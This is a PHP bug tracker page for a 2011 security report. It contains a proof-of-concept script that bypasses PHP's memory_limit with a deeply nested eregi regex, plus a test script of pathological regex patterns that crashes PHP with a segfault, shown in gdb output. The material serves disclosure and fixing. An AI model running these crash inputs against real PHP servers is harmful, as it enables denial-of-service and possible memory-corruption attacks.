|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2011-11-21 07:44 UTC] stas@php.net
[2011-11-22 00:54 UTC] max at cxib dot net
[2011-11-22 01:00 UTC] stas@php.net
[2011-11-23 05:19 UTC] max at cxib dot net
[2012-05-13 15:10 UTC] felipe@php.net
-Private report: No
+Private report: Yes
[2017-08-26 12:22 UTC] cmb@php.net
-Assigned To:
+Assigned To: stas
[2017-08-26 12:22 UTC] cmb@php.net
[2018-12-18 01:27 UTC] stas@php.net
-Status: Assigned
+Status: Closed
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Mon Oct 27 12:00:02 2025 UTC |
Description: ------------ <? /*poc memory_limit bypass */ ini_set("memory_limit","32M"); if($argv[1]==1) $sss=str_repeat("A",$argv[2]); elseif($argv[1]==2) eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a"); ?> fix http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regcomp.c http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/engine.c http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regex2.h Test script: --------------- <?php /* tests regcomp. version in php. original based code http://cvsweb.netbsd.org/bsdweb.cgi/src/tests/lib/libc/regex/t_exhaust.c runing: cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -v 1000000 cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -m 1000000 then run it with result Program received signal SIGSEGV, Segmentation fault. memcpy () at ../sysdeps/x86_64/memcpy.S:432 432 ../sysdeps/x86_64/memcpy.S: No such file or directory. in ../sysdeps/x86_64/memcpy.S (gdb) x/i $rip => 0x7ffff6a7fc69 <memcpy+777>: mov %rax,(%rdi) (gdb) x/x $rax 0x28000002: Cannot access memory at address 0x28000002 (gdb) x/x $rdi 0x7fffdd79c000: Cannot access memory at address 0x7fffdd79c000 */ function patterns($len){ return array( "(".str_repeat("\(",$len).")", // for p_bre recursion (crash has been fixed) "(".str_repeat("\(",60).str_repeat("(.*)",$len).")", // for p_bre recursion (problematic for p_bre len>70000) "(.?)".str_repeat("((.*){0,255}",$len)."".str_repeat(")",$len), "(.?)".str_repeat("(.\{0,}",$len)."".str_repeat(")",$len), "(.?)".str_repeat("((.*){1,255}",$len)."".str_repeat(")",$len), "(.?)".str_repeat("(",$len).".*".str_repeat("){1,100}",$len), str_repeat("(?:(.*)|",$len)."(.*)".str_repeat(")",$len) ); } function execc($patt){ eregi($patt,"a"); return 0; } if(isset($argv[1]) and isset($argv[2])){ $patts=patterns($argv[2]); echo $patts[$argv[1]]; execc($patts[$argv[1]]); } else for($flen=1;$flen<1000;$flen+=$flen){ $currpat=patterns($flen); for($fl=0;$fl<count($currpat);$fl++) execc($currpat[$fl]); } ?>